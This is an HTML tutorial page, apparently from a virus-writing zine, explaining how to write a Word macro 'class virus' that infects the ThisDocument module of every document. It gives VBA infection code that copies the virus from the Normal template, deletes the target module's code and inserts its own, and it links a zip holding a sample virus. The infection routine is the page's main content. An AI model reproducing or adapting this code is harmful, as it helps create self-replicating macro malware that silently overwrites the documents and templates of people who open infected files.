<html>

<head>
<title></title>
</head>

<body background="Mars%20soil.jpg">

<h1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<u><font color="#000000">The Class Virus</font></u></h1>

<p><big>The class virus infects class moduls of a Word document. Classes are invisible in
the 'Tools-</big><br>
<big>macros' dialoge. I prefer to write class virii, wich infect the class 'ThisDocument'.
This is</big><br>
<big>because this class is in EVERY document. I'll explain here how to write such virii.
Notice, that</big><br>
<big>this virii have a different infection method!</big></p>

<p><big>To get my own possition I use:&nbsp;&nbsp;&nbsp;&nbsp; </big><br>
<u><big>MyPos=ThisDocument.Name</big></u><br>
</p>

<p><big>The class of the ThisDocument, I want to infect, depends on MyPos.</big><br>
<big>Let's say MyPos=&quot;Normal.dot&quot; so I take: </big><br>
<u><font color="#000000"><big>set
target=ActiveDocument.VBProject.VBComponents(1).CodeModule</big><br>
</font></u></p>

<p><big><font color="#000000">The code for the infection:</font></big></p>

<p><font color="#000000"><big>With NormalTemplate.VBProject.VBComponents(1).CodeModule</big><br>
<big>&nbsp;&nbsp;&nbsp; VirusCode= .Lines(1, .CountOfLines)</big><br>
<big>End With</big><br>
</font></p>

<p><font color="#000000"><big>With target</big><br>
<big>&nbsp;&nbsp;&nbsp; .DeleteLines 1, .CountOfLines</big><br>
<big>&nbsp;&nbsp;&nbsp; .InsertLines 1, VirusCode</big><br>
<big>End With</big></font></p>

<p><font color="#000000"><big>Take a look at the file TDIE V2.0 at the </big></font><a
href="Added.zip">Added.zip</a></p>
</body>
</html>
